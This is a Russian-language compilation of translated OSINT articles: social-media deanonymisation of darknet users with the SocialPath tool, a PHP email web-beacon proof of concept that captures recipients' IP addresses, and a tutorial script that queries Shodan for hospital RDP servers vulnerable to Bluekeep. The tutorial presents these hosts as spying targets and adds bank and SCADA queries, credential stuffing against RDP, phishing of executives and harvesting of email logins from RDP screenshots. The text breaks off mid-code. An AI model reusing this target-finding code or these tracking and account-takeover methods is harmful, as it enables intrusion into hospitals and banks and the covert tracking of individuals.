Таким образом, приложение доверяет только определенным сертификатам. Добавление ненадежного сертификата в систему, такого как тот, который поставляется с Fiddler, не работает, приложение не сможет установить соединение.
Можно ли обойти эту защиту? Да, такие инструменты, как Frida, помогут это сделать, но это выходит за рамки данной статьи.
Плохая новость заключается в том, что во многих приложениях реализована система работы только с доверенными сертификатами, чтобы прокси-сервер не работал с HTTPS-трафиком.
Хорошая новость заключается в том, что certificate pinning не позволяет белым хакерам и исследователям находить ошибки в приложениях (и это плохо). Поэтому разработчики приложений ввели дополнительные «Настройки для Whitehat», чтобы разрешить перехват и расшифровку трафика HTTPS.
Facebook применил эти настройки для приложений Facebook, Messenger и Instagram.
Вывод
Мобильные приложения являются хорошим источником информации о людях для
различных расследований, и чтобы оптимизировать поиск, необходимо уметь
работать с трафиком и распознавать в нем полезные детали. В этой статье я
показал на практический примерах то, как правильно это делать и то, какие
проблемы можно встретить на своем пути.
оригинал этого материала на английском можно
[здесь](https://medium.com/@BTF117/finding-osint-eggs-in-mobile-
apps-f99d823058f9).
автор перевода Moody
Здесь представлены различные агерегаторы информации собранные с утечек с большим количеством баз. А также интересные поисковые ресурсы и инструменты OSINT. (Разведка на основе открытых источников), которые можно использовать для поиска информации.
Поиск По Фотографиям
Поиск по лицу
http://catcut.net/vvoL + @VkUrlBot
Поиск первоисточника картинки и всех доменов где она хостится
Поисковые Cистемы Людей
Мир
Cтраны
Могу дополнить если будет заинтересованность
SocialPath - это приложение
написанное на Django для сбора информации в социальных сетях по конкретному
имени пользователя. Оно собирает сведения из Twitter, Instagram, Facebook,
Reddit и Stackoverflow, сортирует по частоте используемых слов, хэштегам,
времени, упоминаниям, смежным аккаунтам и представляет в виде диаграмм с
использованием D3js. Такой подход помогает отслеживать пользователей с
уникальными никнеймами в даркнете.
Введение
В моих предыдущих статьях вы могли прочитать о том, как собирать
[геопространственные данные](https://medium.com/@woj_ciech/state-of-
industrial-control-systems-in-poland-and-
switzerland-656e2e363fe3?source=---------4------------------), информацию о
[доменах](https://medium.com/hackernoon/osint-tool-for-visualizing-
relationships-between-domains-ips-and-email-
addresses-94377aa1f20a?source=---------13------------------), находить [утечки
](https://medium.com/@woj_ciech/leaklooker-part-3-dna-samples-internal-files-
and-more-967e794fa031)или [вредоносные
программы](https://medium.com/secjuice/chasing-malware-and-c-c-servers-in-
osint-style-3c893dc1e8cb?source=---------17------------------). Настало время
заглянуть в социальные сети с точки зрения OSINT.
Социальный медиа-интеллект (SOCMINT) одна из главных составляющих OSINT, непрерывно связанная с агентурной разведкой (HUMINT). В настоящее время люди используют различные платформы для обмена информацией о себе и не догадываются о том, кто и зачем может использовать сведения об их привычках, интересах, посещенных местах и, очевидно, мнении. Мониторинг социальных сетей широко используется различными агентствами для поиска по используемым пользователями словосочетаниям, хэштегам, для отслеживания активности и установлении взаимосвязей. Есть много сценариев, при которых SOCMINT полезен, например, при слежке за активностью бот-сети в твиттере, поиске фотографий по геолокациям или выявлением действующих преступников. Последнее возможно благодаря использованию одного и того же никнейма одним пользователем во всех социальных сетях. Это обычное дело, если вы популярны и хотите, чтобы вас все знали лишь по одной строке. Однако, всегда стоит помнить, что смешивать личность из даркнета с хакерских форумов, с реальной страницей из социальных сетей - не есть хорошо.
Как правило, такой подход обеспечивает молниеносную победу правоохранительных органов над вами. Я читал множество кейсов, в которых торговцы наркотиками из даркнета использовали один и тот же ник на сайте торговой площадке и в Твиттере. Отсутствие базовой операционной безопасности (OPSEC) привело к поимке этих парней.
Я провел исследование, в ходе которого выяснил, что повсеместное использование одних и тех же никнеймов во всех социальных сетях довольно распространено для пользователей даркнета.
Исследование
На основании открытых уголовных дел, обвинительных заключений, объявлений
Министерства юстиции и различных статей, я собрал методы, которые
правоохранительные органы используют для расследования дел с пользователями
даркнета, вовлеченных в незаконную деятельность. Лично меня чтение таких
вещей, как рассекреченные документы, запросы, жалобы или поощрения FOIA
увлекают больше, чем любые книги. Читая такие сведения, вы можете получить
представление о каком - то конкретном деле, сделать свои собственные выводы и
исследовать методы, используемые правоохранительными органами для
деанонимизации пользователей Darknet.
Для проведения исследования, я выделил для себя один форум в даркнете, с которого и будут собраны общедоступные сведения о преступниках, чтобы затем найти их в различных социальных сетях, таких как Facebook, Instagram, Twitter, Stackoverflow и Reddit. Здесь стоит сделать важное замечание - выбор форума играет очень важное значение в итоговых результатах, которые будут получены по окончанию расследования. Если вы выбрали какой - нибудь македонских сайт, то и искать аккаунты преступников стоит в соответствующих соц. сетях.
Повторюсь, что данный способ мы будем использовать для деанонимизации
пользователей, которые используют один и тот же никнейм на всех сайтах, на
которых они регистрируются. Чтобы убедиться, что оба аккаунта (даркнет и
клирнет) принадлежат одному и тому же лицу, проводится дополнительный анализ
фотографий, слов, таймлайнов или интересов.
Одни и те же аккаунты
Давайте рассмотрим дело Соединенных Штатов против Абдуллы
Альмашвали.
Поиск по адресу электронной почты, связанный с публичным PGP ключом, который
был указан на одном из сайтов, позволил обнаружить профили его владельца в
социальных сетях. После этого правоохранительные органы получили ордер на
"обыск" для каждого аккаунта с доступом к личной переписке. Основной ошибкой
здесь было использование одного и того же ника из электронной почты на
остальных сайтах, на которой регистрировался преступник.
Все сайты социальных сетей регулируются надлежащим законодательством, и правоохранительные органы могут выудить из них достаточно информации, получив ордер на обыск. Ниже вы можете найти пример того, какую информацию правоохранители вытащили из аккаунта на Reddit, из дела против Маркоса Пауло Де Оливьерия-Аннибале.
Фотографии
Повсеместное использование одного и того же никнейма - не лучшая идея, но
повсеместное изображение одних и тех же изображений в профиле - еще хуже. Дело
NarcoBoss (Соединенные Штаты Америки против Генри Коффи) показывает, что одним
из поводов для объединения двух аккаунтов была одна и та же картинка профиля,
которую он использовал на двух рынках даркнета.
Иногда одна картинка вместо тысячи слов, а дело «США против Уайетта
Пасека»
показывает, что после выявления подозреваемых в социальных сетях все было
предельно ясно. По какой-то причине торговцы наркотиками хотят чувствовать
себя рок-звездами и повсюду хвастаться своим богатством, но в конце концов это
оказывается лишь еще одним доказательство в суде.
Словосочетания
Интересным аспектом исследований такого типа является сравнение использованных
слов. Специалистам по лингвистическому анализу часто приходится определять
настоящую страну происхождения человека. Некоторые слова, предложения или
идиомы имеют уникальное значение в разных странах, и на основе этого
проводится исследование, чтобы можно было связать стиль письма людей. Аккаунты
OxyMonster были объединены из-за «большого сходства в использовании слов и
знаков препинания».
У людей есть привычки совершать одну и ту же ошибку снова и снова в
определенных словах, это также может быть использовано против них.
Кроме этого, при проведении экспертизы, содержимое каждого сообщения
проверяется вручную, чтобы установить связь с ранее найденными фотографиями,
сообщениями в социальных сетях и другой информацией. Еще одно доказательство
по делу Med311n свидетельствует о том, как агенты нашли фотографии с книгой
«Гоморра» на заднем плане и нашли упоминание о ней на форуме Уолл-стрит-
маркета.
Ручной просмотр всех постов, твитов или фотографий, возможно связанных с
отдельным человеком, очень утомителен и требует много времени.
Упоминания о других пользователях также интересуют следователей, поскольку они
создают сеть, с которой взаимодействует подозреваемый. Среди найденных
упоминаний могут быть его настоящие друзья не соблюдающие информационную
гигиену, виртуальные друзья или другие его аккаунты.
Временные метки
Не стоит отчаиваться, если вы не нашли достаточно компромата. Не забывайте,
что вся активность пользователей в социальных сетях отслеживается и
логгируется. Большое значение играют временные метки, которые показывают,
когда пользователь каким-либо образом был активен, опубликовал фотографию,
прокомментировал или взаимодействовал с кем - то. Я снова упомяну дело Med3l1n
в качестве примера того, как можно связать действия социальных сетей и
человека из Darknet. Отсутствие активности на рынке в даркнете и фотографии из
отпуска в Майами, в социальных сетях, позволили правоохранителям выяснить, что
это один и тот же человек.
Любой, кто проводит такое расследование, должен учитывать часовой пояс. Ранее
мы искали страну происхождения при помощи лингвистической экспертизы. Но
поводом, чтобы вас найти, может послужить и часовой пояс. Говорить о том, что
вы работаете с 9 до 5 и сообщать при этом часовой пояс - не лучшая идея.
Прочее
Это смелый поступок - зарегистрировать товарный знак, связанный с вашим
профилем в DarkNet. Любой, кто занимается криминальной деятельностью в
даркнете, должен ожидать, что его никнейм уже есть в базе данных
правоохранительных органов, и каждое упоминание о нем отслеживается или будет
отслеживаться в виртуальном мире и в реальной жизни.
Конечно, это не решающее доказательство, а лишь возможная улика для всего
дела, которое включает перехват посылок, физическое наблюдение или записи
мобильных звонков. Но разведка социальных сетей играет решающую роль во всем
расследовании.
Проблема, которая появилась при проведении исследования, заключалась в том, как сравнивать пользователей из разных социальных сетей. А еще как сравнить их активность, аватарки, используемые слова и сообщества?
SocialPath
SocialPath - это простое приложение для поиска учетных записей в таких социальных сетях, как Facebook, Instagram, Twitter, Reddit и Stackoverflow. В качестве бэкенда я выбрал Django, а на фронте активно используется D3js для рисования графиков. Получаемые результаты представлены в виде плиток с изображениями профиля и базовой информацией, такой как биография, URL из биографии, подписчики или друзья. Страница сведений содержит диаграммы, основанные на активности пользователя, то есть heatmap календарь, диаграмму lolipop, диаграмму прокрутки и wordcloud.
При вводе имени пользователя, происходит редирект в панель инструментов с
учетными записями, которые вы уже искали ранее. Начнется процесс сбора
информации и в течение пары минут, будет получено изображение профиля вместе с
основной информацией о нем.
Если искомый профиль действительно существует, вы можете нажать на его
фотографию и перейти на страницу с подробной информацией. Если пользователь с
указанным никнеймом не существует, вы увидите сведения о похожих учетных
записях. Эта опция также активирована по-умолчанию в разделе WorldCloud, если
учетная запись существует.
Полные данные включают в себя вышеупомянутые интерактивные диаграммы для
каждого существующего пользователя. Календарь Heatmap, известный многим из
Github, показывает, когда пользователь совершает какое - либо действие, к
примеру, публикует фотографию или твит. Нажатие на каждый активный квадрат
перенаправит вас к списку действий, совершенных с этого конкретного дня.
На диаграммах Lolipop собраны хэштеги с Twitter, Facebook и Instagram, теги с
Stackoverflow и сабреддиты с Reddit. Он показывает, сколько раз пользователь
включал хэштег, сколько раз он был активен в определенном теге или субреддите.
Частота слов иллюстрируется с помощью таблицы прокрутки. Трудно
визуализировать все слова, использованные человеком единожды. Поэтому я
собираю 500 самых популярных слов, используемых пользователем в комментариях,
твитах, постах и т. Д. И их частоту.
Wordclouds используются для представления разнообразия взаимодействия с
пользователем. Например, для Reddit он показывает положительные отзывы,
поэтому легко проверить конкретный пост с конкретными отклонениями. Это
быстрый способ определить, нравится ли пользователю сообщество и какой пост
набрал больше или меньше голосов. После нажатия на конкретный номер,
произойдет перенапревление на соответствующий пост или комментарий.
Ограничения
Приложение использует API-интерфейсы, поэтому вам необходимо указать все
соответствующие ключи в файле конфигурации. Из-за действующей политики
Facebook загружаются только те сообщения, для которых API не нужен. Также
Stackoverflow не требует аутентификации для менее чем 300 запросов в день (я
ее не стал реализовывать). Instagram позволяет использовать их общедоступный
API, но иногда с ним возникают проблемы, поэтому лучше собственноручно
скопировать Cookie в файл с конфигурацией.
Вы можете посмотреть все таски в интерфейсе администратора.
Это первая версия, и, возможно, в ней есть некоторые недостатки, поэтому любая
проблема или запрос на получение ответа приветствуются.
Если вам нужна помощь в OSINT-расследовании, вы можете написать мне @the_wojciech, если нет, можете просто следить за моими исследованиями.
Вывод
По понятной причине я не буду публиковать результаты своего исследования, но вы можете повторить это самостоятельно. Занимаясь нелегальной деятельностью в даркнете, следует помнить, что используемый вами никнейм априори скомпроментирован, и не должен использоваться где - то еще. Суровая реальность часто оказывается жестокой, и преступники очень часто попадают в собственные ловушки. SocialPath показывает, что создавать приложения для разведки не сложно, поэтому у правоохранительных органов припасены более мощные инструменты, обладающие огромной базой данных с ранее захваченных рынков и предполагающие мониторинг в реальном времени.
оригинал материала на английском
[здесь](https://www.offensiveosint.io/socialpath-track-users-across-social-
media-platforms/)
перевод канал Cybred
Введение
Независимо от того, пытаетесь ли вы отследить кого-либо или отслеживаете какие-либо действия и действия пользователя (возможно, в кампании по электронной почте), методы одинаковы/схожи. Действия по отслеживанию электронной почты:
Отслеживание электронной почты: как электронная почта отслеживается
Упрощенно, поместив изображение в контент электронной почты (HTML), отправитель может отслеживать некоторые из ранее упомянутых параметров (открытые электронные письма, ссылки, IP-адреса и т.д.). Изображение часто невидимо, однопиксельный GIF (называемый веб-маяком). Открытие электронного письма приведет к загрузке изображения с удаленного сервера, что в результате приведет к обнаружению «открытого электронного письма» или отслеживанию IP- адреса получателя (в некоторых случаях).
В больших почтовых кампаниях, чтобы различать пользователей и электронные письма, имя загруженного изображения (или его параметры) обычно содержит некоторую информацию, относящуюся к пользователю (идентификатор, хэш и т. Д.). Кроме того, вы можете разместить ссылку в сообщении электронной почты («Начать здесь», «Отслеживать» и т.д) И отслеживать частоту ответов пользователей или показатель успешности кампании по электронной почте (отправленные электронные письма или открытые электронные письма и частоту кликов).
Пример отслеживания электронной почты (PoC)
Нам нужно включить один пиксель GIF/изображение в электронное письмо через ссылку на изображение, например:
Code:Copy to clipboard
<img src="https://<TARGET_DOMAIN>/webbeacon.php"/>
Для создания однопиксельного веб-маяка GIF/изображения в PHP (webbeacon.php):
Code:Copy to clipboard
<?php echo base64_decode ("R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw =="); ?>
Далее, для отправки электронной почты, мы можем использовать конфигурацию почты системы и sendmail. Сначала определите содержимое электронного письма (HTML):
Code:Copy to clipboard
From: <Source/System Email Address>
To: <Target Email Address You're Going TO Track>
Subject: Tracking Email Example
Mime-Version: 1.0
Content-Type: text/html
<h1>Test Email Example </h1>
The mail body.
<img src=" https://<TARGET_DOMAIN>/webbeacon.php" />
Затем направьте этот контент в команду sendmail:
Code:Copy to clipboard
$ cat content.html | sendmail -t
Когда пользователь получает это электронное письмо, почтовый клиент обычно вызывает запрос изображения или в этом случае webbeacon.php. Изображение не будет видно, но, тем не менее, запрос будет запущен.
При этом вы можете отслеживать, открыта ли электронная почта, или ловить IP- адрес получателя. Чтобы отследить какое-либо событие (например, щелчок по ссылке), вам необходимо добавить его в контент и настроить/создать новый файл PHP для его обработки.
Примечание: некоторые почтовые провайдеры/клиенты могут кэшировать изображение (в течение месяца), поэтому дополнительные электронные письма могут не вызывать выборку «веб-маяка».
Отслеживание электронной почты и поддержка клиентов электронной почты
Доля рынка почтовых клиентов на удивление склоняется к Apple. Грубая оценка текущей доли рынка:
Чтобы вернуться к предыдущему пункту, отслеживание электронной почты поддерживается не всеми почтовыми клиентами. Чтобы подтвердить это вручную, мы можем отправить электронное письмо любому из этих клиентов и отслеживать файл журнала веб-сервера (apache/nginx). В журнале будет четко показано, какие почтовые клиенты «включают» отслеживание, а какие нет.
Отслеживание почты Apple iPhone
Открытие электронной почты в почтовом клиенте IPhone приводит к следующему выводу в журнале веб-сервера:
Code:Copy to clipboard
xxx.xxx.xxx.xxx - - [21 / Sep / 2019: 23: 58: 43 +0000] "GET /webbeacon.php HTTP / 2.0" 200 28299 "-" "Mozilla / 5.0 (iPhone; процессор iPhone OS 12_4_1) как Mac OS X) AppleWebKit / 605.1.15 (KHTML, как Gecko) Mobile / 15E148 "
Хотя электронная почта принадлежит Google (@ gmail.com), мы получаем правильный IP-адрес целевого IPhone / Network ( xxx.xxx.xxx.xxx ). По- видимому, никакой предварительной обработки серверами Google MX не происходит. Обработка почтового клиента полностью независима.
Отслеживание почты Google (Gmail)
Открытие электронного письма в GMail:
Code:Copy to clipboard
66.249.81.157 - - [21 / Sep / 2019: 23: 58: 44 +0000] "GET /webbeacon.php HTTP / 1.1" 200 61 "-" "Mozilla / 5.0 (Windows NT 5.1; rv: 11.0) Gecko Firefox /11.0 (через ggpht.com GoogleImageProxy) "
Google использует прокси для получения удаленных изображений (GoogleImageProxy), поэтому не может указать IP-адрес получателя. 66.249.81.157 является прокси - IP в компании Google.
Отслеживание почты Outlook (Hotmail)
Открытие электронной почты через веб-клиент hotmail / outlook:
Code:Copy to clipboard
xxx.xxx.xxx.xxx - - [21 / Sep / 2019: 23: 58: 45 +0000] "GET /webbeacon.php HTTP / 2.0" 200 150 "https://outlook.live.com/" "Mozilla /5.0 (Windows NT 6.3; Win64; x64) AppleWebKit / 537.36 (KHTML, как Gecko) Chrome / 76.0.3809.132 Safari / 537.36 "
В этом случае мы получаем открытый IP-адрес получателя ( xxx.xxx.xxx.xxx )
Отслеживание почты Yahoo
Открытие электронной почты через почтовый аккаунт Yahoo:
Code:Copy to clipboard
212.82.108.87 - - [21 / Sep / 2019: 23: 58: 46 +0000] "GET /webbeacon.php HTTP / 1.1" 200 61 "-" "YahooMailProxy; https://help.yahoo.com/kb/ Yahoo почта прокси-SLN28749.html»
Yahoo также использует прокси для получения удаленных изображений (YahooMailProxy), поэтому не может предоставить IP-адрес получателя. 212.82.108.87 является прокси - IP в компании Google.
Отслеживание других / частных почтовых клиентов
Когда речь заходит о некоторых популярных клиентах (rainloop, roundcube), загрузка удаленных изображений по умолчанию «отключена» (не работает), с опцией «Отображать внешние изображения», которую пользователи могут выбирать вручную (заставляя все это работать).
Code:Copy to clipboard
xxx.xxx.xxx.xxx - - [21 / Sep / 2019: 23: 59: 48 +0000] "GET /test.php HTTP / 2.0" 200 150 "https: // www. <DOMAIN> .com / mail / "" Mozilla / 5.0 (Windows NT 6.1; Win64; x64) AppleWebKit / 537.36 (KHTML, как Gecko) Chrome / 76.0.3809.132 Safari / 537.36 "
Электронная почта Поддержка JavaScript [Дополнительная информация]
Помимо отслеживания электронной почты, выполнение JavaScript представляет существенную уязвимость безопасности. Протокол или явный адрес сценариев ( RFC2854 , в текстовом формате текст / html) поддерживает JS:
Кроме того, введение языков сценариев и интерактивных возможностей в HTML 4.0 привело к ряду рисков безопасности, связанных с автоматическим выполнением программ, написанных отправителем, но интерпретированных получателем. Пользовательские агенты, выполняющие такие сценарии или программы, должны быть чрезвычайно осторожны, чтобы гарантировать, что ненадежное программное обеспечение выполняется в защищенной среде.
Но к счастью, это обычно не поддерживается почтовыми клиентами. Некоторые
пользователи сообщали, что Thunderbird 52.4.0 с настройкой «Original HTML»
игнорировал JS <script> document.write('Test alert'); </script>
в тестовых
электронных письмах. То же самое произошло с Outlook для Android 2.2.44, K-9
для Android 5.208, веб- почтовой программой Gmail (протестировано 06.11.2017)
и веб-почтовой программой Roundcube 0.9.5. Итак, в целом или для большинства
(современных) клиентов JS не работает.
Вывод
Помимо потенциальных сталкеров и/или спамеров, злоупотребляющих этим, пытающихся найти вас или подтвердить, что ваш адрес электронной почты является активным, это довольно полезный навык, который нужно иметь в своем наборе навыков.
В любом случае, мы все должны знать об этом.
Просто открыв электронное письмо, в некоторых почтовых клиентах/приложениях вы можете указать свое местоположение отправителю, подтвердить, что ваш электронный адрес является активным или просто вы видели это электронное письмо. Поскольку протокол «разрешает» JS, в некоторых клиентах злоумышленник потенциально может даже получить доступ к учетной записи электронной почты (кража сеанса). Кроме того, получив IP-адрес получателя, вы можете, в зависимости от ваших навыков социальной инженерии, потенциально убедить интернет-провайдеров раскрыть реальный адрес пользователя. Многочисленные опасности, без сомнения.
Мы все ленивые, но мы должны уделять этому немного больше внимания, особенно если кто-то «скрывается» (от оскорбительного мужа) или, возможно, делает что- то «незаконное» (отслеживая убежище, в котором живет ваша жена). Мы все должны проверить, поддерживают ли наши почтовые клиенты варианты отключения изображений/JS. Если не явно, мы могли бы попытаться найти инструменты, которые это делают (поддержка расширений, библиотек и т.д.), Или мы можем в конечном итоге изменить почтовый клиент и найти тот, который не позволяет отслеживать электронную почту (неявно или явно через опции).
автор: @hata_hack
How do you organize your OSINT findings? I use Maltego and I haven't found a better way to help with OSINT / recon. Anyone using something different ?
Это первая часть цикла туториалов по боевому OSINT'у, которая охватывает
подготовку (техническую и интеллектуальную) и рассказывает как настроить
мониторинг уязвимости Bluekeep в больницах с использованием баз данных Shodan
и Elasticsearch.
Вступление
Эти учебные пособия дадут вам представление о методах OSINT, используемых
киберпреступниками для поиска различных организаций и людей с целью
мошенничества и взлома. Это не очередная статья, ведущая на другой сайт с
кучей ссылок и описанием того, что они делают, а скорее технические сведения
для профессиональных аналитиков безопасности, обладающих хотя бы некоторыми
навыками программирования и аналитическим складом ума. Я хотел бы показать
каждую область OSINT - социальные сети, Dark Web, утечки, промышленный /
корпоративный шпионаж и тому подобное.
Первая статья серии посвящена правильной подготовке, то есть настройке среды, комбинированию нескольких инструментов и установке базы данных. Каждая представленная методика будет поддерживаться исследованиями, и в этой части мы рассмотрим открытые протоколы удаленных рабочих столов с уязвимостью Bluekeep и акцентом на медицинские и финансовые учреждения.
В дополнение к статье я покажу некоторые приемы OSINT & RDP, чтобы найти машины для конкретных шпионских целей, используя Credential Stuffing и обратный поиск по изображениям, так что давайте начнем.
Подготовка
Я чувствую, что о психологической подготовке к OSINT-расследованиям и о том,
что вы должны иметь аналитический ум, уметь документировать сведения и строить
отношения между ними, уже все было сказано. Конечно, каждое задание в ходе его
решения требует своего рода разного мышления, но в момент планирования мы
каждый раз должны использовать какой - то общий подход. Лично для меня лучше
всего подходит нисходящий подход - исходя из общей идеи, разделить основную
цель на более мелкие задачи и сосредоточиться на деталях в конце.
В нашем случае основная цель состоит в том, чтобы найти уязвимые RDP службы в медицинских / финансовых учреждениях, которые могут содержать конфиденциальную информацию, не найденную никем ранее. Чтобы достичь этой цели, нам нужно разбить ее на более мелкие задачи:
Вычленение небольших задач позволяет выбрать конкретные технологии для исследования, а также источники данных. Сейчас мы можем подумать о технических аспектах, таких как тип базы данных (облачная / локальная), язык программирования (включая IDE), сервисы и предпочитаемая операционная система. Давайте трансформируем наши цели в технические требования:
Конечно, есть нечто большее, следующий шаг - определить лучший запрос в Shodan, определить идеальное время проверки и настроить Elasticsearch. Это всего лишь пример, но я использовал этот подход много раз во время исследований или разработки инструментов, и он меня ни разу не подвел.
Мы все разобрали и теперь можем перейти к техническому аспекту.
Техническая подготовка
Эта часть требует базовых навыков работы с терминалом Linux и Python, но если
вы их не имеете, не спешите закрывать статью - я все прокомментирую. Давайте
начнем с настройки собственной базы данных.
Elasticsearch - это инструмент с открытым исходным кодом для поиска и анализа
различных типов данных, включая текстовые, числовые, геопространственные,
структурированные и неструктурированные.
Документация делает процесс установки очень простым; сначала нам нужно скачать
и установить публичный ключ репозитория
Code:Copy to clipboard
wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -
Установить https-transport:
Code:Copy to clipboard
sudo apt-get install apt-transport-https
Создать файл с информацией о репозитории:
Code:Copy to clipboard
echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list
Обновить кэш и устанавить ElasticSearch:
Code:Copy to clipboard
sudo apt-get update && sudo apt-get install elasticsearch
Запустить немедленно Unit elasticsearch.service:
Code:Copy to clipboard
sudo systemctl enable elasticsearch.service –now
Для проверки работоспособности открыть:
Code:Copy to clipboard
http://localhost:9200
Конфигурацию и дальнейший менеджмент вы можете найти здесь.
Python является одним из лучших языков программирования для решения такого рода задач-сценариев, и хорошая IDE может ускорить весь процесс разработки, сделав нашу жизнь намного проще. Я не хочу сказать, что люди пишущие в блокноте неэффективны, но IDE помогает свободно перемещаться по коду и быстро управлять репозиторием. Моя любимая IDE - Pycharm, она создает отдельную виртуальную среду для каждого проекта, поддерживает кастомизацию, несколько терминалов, локальную историю и множество других функций.
Что вы должны знать об этой IDE, так это горячие клавиши. Иногда, когда я работаю с Pycharm, я часами не касаюсь своей мыши - хоткеи ускоряют работу и делает работу чрезвычайно простой. Вот парочка наиболее полезных
Code:Copy to clipboard
2x shift – быстрый поиск по всему проекту
Ctrl + / - закомментировать/раскомментировать текущую строку
Ctrl + Shift + / - закомментировать/раскомментировать выделенный код
Shift + f10 – выполнить код
Shift + f9 – режим отладки
Ctrl + r – замена в тексте
Ctrl + h – история
Alt + f12 – открыть терминал
Вы можете найти их все на сайте Jetbrains.
OSINT & Bluekeep
Импортируем необходимые пакеты в наш проект
Code:Copy to clipboard
from elasticsearch import Elasticsearch
import requests
import json
import email.message
import smtplib
Создадим индекс под названием rdp-monitoring , где мы будем хранить все данные.
Code:Copy to clipboard
es.indices.create(index='rdp-monitoring', ignore=400)
Теперь можно перейти к получению машин с открытым RDP в Shodan.
Несколько переменных, которые мы должны определить
Code:Copy to clipboard
SHODAN_API_KEY = ""
query = "port:3389 org:hospital"
endpoint = "https://api.shodan.io/shodan/host/search?key="+SHODAN_API_KEY+"&query="+query+"&page="
cve = "CVE-2019-0708"
fresh = []
Fresh - это пустой список, который будет содержать новые (свежие) IP-адреса.
И код для извлечения хостов, уязвимых для Bluekeep
Code:Copy to clipboard
try:
shodan_request = requests.get(endpoint)
shodan_json = json.loads(shodan_request.text)
for result in shodan_json['matches']:
if not exists(result['ip_str']):
check_each_host = requests.get("https://api.shodan.io/shodan/host/" + result['ip_str'] + "?key=" + SHODAN_API_KEY)
check_each_host_json = json.loads(check_each_host.content)
if 'vulns' in check_each_host_json:
if cve in check_each_host_json['vulns']:
fresh.append(result['ip_str'])
print("New IP:" + result['ip_str'])
es.index(index="rdp-monitoring", id=check_each_host_json['ip_str'], body={"organization": check_each_host_json['org']})
else:
print("IP exists")
if fresh:
send_notification(fresh)
except Exception as e:
print(e)
Он отправляет API-запрос в Shodan с текстом «port: 3389 org: hospital» (я не нашел дорки для Bluekeep), перебирает результаты в цикле, а затем делает еще один запрос для проверки каждого хоста на наличие CVE-2019-0708. Shodan не всегда возвращает vulns в общих результатах поиска, поэтому мы должны проверять каждый IP отдельно (check_each_host).
После этого мы проверяем, есть ли какие-либо уязвимости, если да - то содержит ли полученный список наш CVE-2019-0708. Содержит - добавляем его в Elasticsearch.
Code:Copy to clipboard
es.index(index="rdp-monitoring", id=check_each_host_json['ip_str'], body={"organization": check_each_host_json['org']})
Я использую IP-адрес в качестве поля идентификатора для упрощения поиска без
использования фильтрации источников.
Скрипт проверяет только первую страницу, на которой около 70 результатов, - вы
можете дописать код использующий пагинацию для получения дополнительных
результатов.
Итак, мы сохранили IP-адреса и связанные с ними организации в Elasticsearch, но если скрипт будет запущен в следующий раз, он будет должен распознать, какие записи еще не находятся в базе данных. Для этого мы можем написать дополнительную функцию «exists»
Code:Copy to clipboard
def exists(ip):
try:
es.get(index='rdp-monitoring', id=ip)
return True
except:
return False
Он просто пытается получить документ на основе индекса и идентификатора, который в нашем случае является IP-адресом. Если запись не существует, происходит ошибка, которую мы обрабатываем и возвращаем False.
Последняя часть состоит в том, чтобы всегда быть в курсе событий и получать сообщения на почту каждый раз, когда скрипт находит новые машины. Для этого нам нужно написать еще одну функцию, которая использует учетную будет использовать учетную запись Gmail и отправлять сообщения
Code:Copy to clipboard
def send_notification(ips):
body = "<h1>New IPs in hospitals with Bluekeep</h1><br>"
ips_text = ""
for ip in ips:
ips_text = ips_text + "https://beta.shodan.io/host/" + ip + "<br>"
msg = email.message.Message()
msg['Subject'] = 'RDP Monitoring'
msg['From'] = "@gmail.com"
msg['To'] = "@gmail.com"
msg.add_header('Content-Type', 'text/html')
msg.set_payload(body + ips_text)
gmail_user = "@gmail.com"
gmail_password = ""
try:
server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
server.ehlo()
server.login(gmail_user, gmail_password)
server.sendmail(msg['From'], [msg['To']], msg.as_string())
server.close()
print('Email sent!')
except Exception as e:
print(e)
print('Something went wrong...')
pass
Это самый простой код, найденный где-то в сети и модифицированный для поддержки text/html контента. По сути, мы просто создаем информационный текст с нашими свежими IP-адресами (сохраненными в новом списке) и отправляем его на заданный адрес электронной почты. Чтобы скрипт корректно работал, вы также должны ввести свой адрес электронной почты и пароль в коде, а также войти в свою учетную запись Gmail в браузере с того же компьютера.
После его запуска, новые записи появятся в Elasticsearch
Вы можете добавить скрипт в Cron или скомбинировать его с другим инструментами
в вашем арсенале.
Не только больницы являются интересной целью, запрос «port: 3389 org: bank» вернет вам все машины с открытым RDP в финансовых учреждениях, в названиях которых фигурирует слово «bank». Если пойти еще дальше, то использование свободного текстового поиска и таких слов, как «scada», покажет потенциальные системы промышленного контроля, компрометация которых бесценна.
Click to expand...
Credential stuffing & RDP
Единожды скомпрометировав учетные данные пользователя на одном сайте,
Credential stuffing предполагает доступ к прочим сервисам, на которых была
зарегистрирована жертва, под теми же данными. В большинстве случаев после
создания дампа, киберпреступники проверяют пары имя_пользователя/почта:пароль
на других популярных платформах, таких как Facebook, Spotify, Netflix и т. д.
Это тема была предметом моего исследования в прошлом году, вы можете прочитать
больше [тут](https://www.offensiveosint.io/advanced-credential-stuffing-with-
pepe/).
Протокол для подключения к удаленному рабочему столу не является исключением,
Когда вы ищете RDP для конкретной компании, не забывайте использовать метод свободного текстового поиска, - компьютер может находиться в облаке и отображать имя организации в поле имени пользователя или в предупреждении о безопасности.
Click to expand...
APT используют две тактики для получения доступа к сети - концентрация на персонале без технических знаний и знаний в области безопасности (HR'ы, например), выполнение скрытой вредоносной нагрузки без обнаружения и, в самом конце, повышение привилегий.
Ориентация на высокопоставленных лиц (CEO, CISO, старшее руководство) для почти что автоматического получения доступа к конфиденциальным данным зависит от полномочий жертв. Часто киберпреступники отправляют фишинговые электронные письма высшему руководству, например старшим аналитикам и инженерам, которые работают в критических отраслях - в медицине, правительстве, образовании.
HaveIBeenPwned & RDP
Чтобы убедиться в том, стоит ли взламывать какой-либо RDP, основываясь на
открытом имени пользователя, нам нужно задействовать OSINT и навыки работы с
электронной почтой.
Во-первых, давайте найдем RDP с электронной почтой, используемой в качестве
логина для входа в учетную запись. Для этого можно использовать запрос
„port:3389
has_screenshotrue
'gmail '”, изменяя gmail на любого другого провайдера электронной почты или
компанию. К сожалению, по неизвестным мне причинам, Shodan не может
использовать поиск с символом «@», который бы точно указывал на то, что мы
ищем именно электронную почту.
Следующий код извлекает адреса электронной почты Gmail из открытых RDP
Code:Copy to clipboard
query = "port:3389 has_screenshot:true gmail"
endpoint = "https://api.shodan.io/shodan/host/search?key="+SHODAN_API_KEY+"&query="+query+"&page="
req = requests.get(endpoint)
